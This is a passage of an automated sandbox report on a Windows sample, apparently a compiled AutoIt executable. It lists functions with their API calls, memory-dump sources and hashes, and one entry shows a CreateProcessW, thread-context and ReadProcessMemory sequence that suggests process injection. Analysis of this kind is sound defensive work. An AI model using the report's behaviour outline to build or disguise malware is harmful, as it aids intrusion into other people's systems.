                                                    • Instruction ID: 95d93236df5c9db4006657ee848168969988d0acf3f441ee76e5a0cead67861d
                                                    • Opcode Fuzzy Hash: 619aaabe1949ea15ac64a7936bf5e37b3f8723b2a016095a561ffb0016d74b1b
                                                    • Instruction Fuzzy Hash: FF01B970284709BEF3681E14CC8AFA7379DEB01768F108318FAE65A2E0C6B01D458F50
                                                    Function 00620FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0062594C: __FF_MSGBANNER.LIBCMT ref: 00625963
                                                      • Part of subcall function 0062594C: __NMSG_WRITE.LIBCMT ref: 0062596A
                                                      • Part of subcall function 0062594C: RtlAllocateHeap.NTDLL(01300000,00000000,00000001,00000000,?,?,?,00621013,?), ref: 0062598F
                                                    • std::exception::exception.LIBCMT ref: 0062102C
                                                    • __CxxThrowException@8.LIBCMT ref: 00621041
                                                      • Part of subcall function 006287DB: RaiseException.KERNEL32(?,?,?,006BBAF8,00000000,?,?,?,?,00621046,?,006BBAF8,?,00000001), ref: 00628830
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 3902256705-0
                                                    • Opcode ID: 58ddbfe1b93e486c5de8325581b6ed458fed8e9b8fe2c0c962bfefebb47c1076
                                                    • Instruction ID: 830258377f1e12fc7fb2d232e0ed21d01f99baa50887c140a5f4146925890bf7
                                                    • Opcode Fuzzy Hash: 58ddbfe1b93e486c5de8325581b6ed458fed8e9b8fe2c0c962bfefebb47c1076
                                                    • Instruction Fuzzy Hash: C3F0F934505A7EA6CB20AE54FC159DF7BAE9F01350F100029FC0496681EFB08AD48AD4
                                                    Function 0062582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __lock_file_memset
                                                    • String ID:
                                                    • API String ID: 26237723-0
                                                    • Opcode ID: 78ead63793243b025359501065f8ef4f6ab381d7402cc3371d3dbeed001164be
                                                    • Instruction ID: 2bbbe1a7b1c2d071e2031555ec72a09f9c2e9f410332d0558708826ef27e26a4
                                                    • Opcode Fuzzy Hash: 78ead63793243b025359501065f8ef4f6ab381d7402cc3371d3dbeed001164be
                                                    • Instruction Fuzzy Hash: FB01B171C01E39EBCF72AF69AC018CE7B63AF80360F044219B8145B2A1DBB58A11DF95
                                                    Function 006255D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00628D68: __getptd_noexit.LIBCMT ref: 00628D68
                                                    • __lock_file.LIBCMT ref: 0062561B
                                                      • Part of subcall function 00626E4E: __lock.LIBCMT ref: 00626E71
                                                    • __fclose_nolock.LIBCMT ref: 00625626
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                    • String ID:
                                                    • API String ID: 2800547568-0
                                                    • Opcode ID: 2f1dcc22039d967336541d072c8dcfe6da40ccba14eb604aadc631203fafd47c
                                                    • Instruction ID: 4d1a0d8269042a346a6190da232577a34ac74799b4662ad9220894dc3bb6e4b7
                                                    • Opcode Fuzzy Hash: 2f1dcc22039d967336541d072c8dcfe6da40ccba14eb604aadc631203fafd47c
                                                    • Instruction Fuzzy Hash: 93F0F071801E319ED7B0AB74AC027AE77A32F40334F55820EA412AB1D2CFBC89028F59
                                                    Function 0394129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03941A5B
                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03941AF1
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03941B13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1662698170.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3940000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                    • String ID:
                                                    • API String ID: 2438371351-0
                                                    • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                    • Instruction ID: 532f1ef2578a9ab6d3f6f0014fd6c3d9a06df154dc5543ac2c338bb98e345c25
                                                    • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                    • Instruction Fuzzy Hash: F412CD24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                                    Function 0060F3F0 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 026945d6fde0e333cfb9ac7fc192e348a422843008121fd4392485f5530f3e18
                                                    • Instruction ID: 14ecaf49a8440737b8d19a505abafdf53364de21ebcf77bcb3b319d84c9f6839
                                                    • Opcode Fuzzy Hash: 026945d6fde0e333cfb9ac7fc192e348a422843008121fd4392485f5530f3e18
                                                    • Instruction Fuzzy Hash: F161BC7064020A9FDB28DF64C981BABB7F6EF04304F14807DE9069B682EB71ED52CB51
                                                    Function 00612123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c3606244d6b8e7d088e8e2a14b219ca692a20a850ca4c4892f7fd2e493d7b2a2
                                                    • Instruction ID: 2199e66e48a655e401bc549efcf8b4dd1b27f8f7e835a401821d342e170c8dde
                                                    • Opcode Fuzzy Hash: c3606244d6b8e7d088e8e2a14b219ca692a20a850ca4c4892f7fd2e493d7b2a2
                                                    • Instruction Fuzzy Hash: 35518F34640605AFCF58EB54C996EAE77A7AF45310F18806CF906AB3D2CB30ED45CB59
                                                    Function 0060766F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: aea015fc25c13e8fd003b555b5af24a91a2a2ce73aa8bcaa270962dbfb21779d
                                                    • Instruction ID: 8409139ecda6aab687b041c7e25e70bfb22f588894e3fb0e87db5e8cf598f1ab
                                                    • Opcode Fuzzy Hash: aea015fc25c13e8fd003b555b5af24a91a2a2ce73aa8bcaa270962dbfb21779d
                                                    • Instruction Fuzzy Hash: 6E31D679A48A12DFC7289F18D190962F7A2FF09350714C56DE84A8B3E5E730FC81CB84
                                                    Function 00605C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00605CF6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: d764f28be66d354061ff6143a7819eedec1072191f8624aef05a66321b616af6
                                                    • Instruction ID: 46f1f3d99f7c62cc289533efb0ad0eedfc361e973b50c0bf5f130550557298c1
                                                    • Opcode Fuzzy Hash: d764f28be66d354061ff6143a7819eedec1072191f8624aef05a66321b616af6
                                                    • Instruction Fuzzy Hash: 97315C31A40B09ABDB18DF29C48469EB7B6FF48310F14862AD81A97790D731A950DF94
                                                    Function 006400D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: bff4b5c66a23294cb2950edad3d17236961649a73631c7a3dae682d33c6c10f2
                                                    • Instruction ID: 30986064217daacf280cd52ae9f5ef6137dff1612b2b860132d804144437e9fa
                                                    • Opcode Fuzzy Hash: bff4b5c66a23294cb2950edad3d17236961649a73631c7a3dae682d33c6c10f2
                                                    • Instruction Fuzzy Hash: 51414774548351CFDB28DF54C484B5ABBE2BF45318F09889CE9898B3A2C732E885CB52
                                                    Function 00604F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00604D13: FreeLibrary.KERNEL32(00000000,?), ref: 00604D4D
                                                      • Part of subcall function 0062548B: __wfsopen.LIBCMT ref: 00625496
                                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,006C62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00604F6F
                                                      • Part of subcall function 00604CC8: FreeLibrary.KERNEL32(00000000), ref: 00604D02
                                                      • Part of subcall function 00604DD0: _memmove.LIBCMT ref: 00604E1A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                    • String ID:
                                                    • API String ID: 1396898556-0
                                                    • Opcode ID: 1d016abec4c76b19fdcea4e63b069478453136a15c4526c681de818ca8c1816f
                                                    • Instruction ID: 4b8f27062edb966d2154854fcba3d0b62d6b84802031bdea8f81d5cf353f569b
                                                    • Opcode Fuzzy Hash: 1d016abec4c76b19fdcea4e63b069478453136a15c4526c681de818ca8c1816f
                                                    • Instruction Fuzzy Hash: 06110D71640706ABCB68FF70DC12F9F77A79F44710F10842DF642A62C1DE715A159B94
                                                    Function 006401AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: 5cc2792954fe61d1346ad03d8ac6a4b0050bc573fe264392324234a0ba4517d4
                                                    • Instruction ID: 7f5f4f5e3797bb364d3836948f89ed4efa19ae886bbe9acb4437e240b278dcc1
                                                    • Opcode Fuzzy Hash: 5cc2792954fe61d1346ad03d8ac6a4b0050bc573fe264392324234a0ba4517d4
                                                    • Instruction Fuzzy Hash: 47214474548351DFCB18DF54C444A5BBBE2BF89344F04896CE98A4B3A2D731E845CB52
                                                    Function 00605D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00605807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00605D76
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 5bdbf36e3f90b83850c2e0e0b8823cc3c748ee78a6fc29cda4fd2d74a479e65a
                                                    • Instruction ID: 7085dc088a2fd2015e960fa55e63f2b2cecefde1e4dc915031d9c80d9c5dd3a9
                                                    • Opcode Fuzzy Hash: 5bdbf36e3f90b83850c2e0e0b8823cc3c748ee78a6fc29cda4fd2d74a479e65a
                                                    • Instruction Fuzzy Hash: 4C113631240B019FD3348F15C888BA3B7EAEF45760F10C92EE4AB86A90D7B0E945CF64
                                                    Function 00607F41 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 81493697be757b975a0c6ed5652a7c4d93deff9418cd33d5771e7bc70a58f4b3
                                                    • Instruction ID: 9a6fb88890c50f9b91efa0641826a184d5b1fee795e0a8c031ab1234d14b8007
                                                    • Opcode Fuzzy Hash: 81493697be757b975a0c6ed5652a7c4d93deff9418cd33d5771e7bc70a58f4b3
                                                    • Instruction Fuzzy Hash: 9D01F9B26447127ED3245F38DC06F67BB99EB447A0F10862EF95ACA2D1EA31F5408B54
                                                    Function 00674583 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 006745C0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentVariable
                                                    • String ID:
                                                    • API String ID: 1431749950-0
                                                    • Opcode ID: 3509d587358b7f7663090cbb56326b8448cddf2c8c68f86667e02a3b75ad6704
                                                    • Instruction ID: 04e90b7cd12704200573e957cf12eb5dc7aa514154bc85af9e73993234459d2c
                                                    • Opcode Fuzzy Hash: 3509d587358b7f7663090cbb56326b8448cddf2c8c68f86667e02a3b75ad6704
                                                    • Instruction Fuzzy Hash: 5CF08135608149AFDB54EBA4D846CAF7BBDEF45320B00405AF805DB251DE70A940CBA4
                                                    Function 00624A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __lock_file.LIBCMT ref: 00624AD6
                                                      • Part of subcall function 00628D68: __getptd_noexit.LIBCMT ref: 00628D68
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __getptd_noexit__lock_file
                                                    • String ID:
                                                    • API String ID: 2597487223-0
                                                    • Opcode ID: 362d79e66e20e22a93104c133d6487d5cf089ddda49a09934b4e2afc2bc92797
                                                    • Instruction ID: c6c496aba5e0550765485e94ec701b99da5687403f6783d47623ea83cdd6c5e5
                                                    • Opcode Fuzzy Hash: 362d79e66e20e22a93104c133d6487d5cf089ddda49a09934b4e2afc2bc92797
                                                    • Instruction Fuzzy Hash: 9DF08131941A299FDF91AF64EC063DE3663AF00325F054518F8149B1D1CF788951DF59
                                                    Function 00604FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,?,006C62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00604FDE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: 3d7ffeb2d25669fc1add654da8d91beb6d1984d1b299082015ad04dd3f6960e8
                                                    • Instruction ID: 739358db1543f457e91f265e8a142a50c2e602d8d6b569ba5950569461410690
                                                    • Opcode Fuzzy Hash: 3d7ffeb2d25669fc1add654da8d91beb6d1984d1b299082015ad04dd3f6960e8
                                                    • Instruction Fuzzy Hash: 16F039B1145B12DFCB389F64E494853BBE3BF443293208A3EE2D782650CB31A840DF40
                                                    Function 006209D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006209F4
                                                      • Part of subcall function 00607D2C: _memmove.LIBCMT ref: 00607D66
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: LongNamePath_memmove
                                                    • String ID:
                                                    • API String ID: 2514874351-0
                                                    • Opcode ID: 11756d807688dbfd0bc464255041fe7dbc8e2ee230adda796c46be0b87ce14c6
                                                    • Instruction ID: fdc08f9bf59dd5d010e6cb9239a3c4c77c3cf02548b7a93ca2f64ac7b606e64f
                                                    • Opcode Fuzzy Hash: 11756d807688dbfd0bc464255041fe7dbc8e2ee230adda796c46be0b87ce14c6
                                                    • Instruction Fuzzy Hash: 98E0CD36D4422857C720D6989C15FFAB7EEDFC9790F0401B5FC0CD7244D9A0AD8186D4
                                                    Function 00669129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock
                                                    • String ID:
                                                    • API String ID: 2638373210-0
                                                    • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
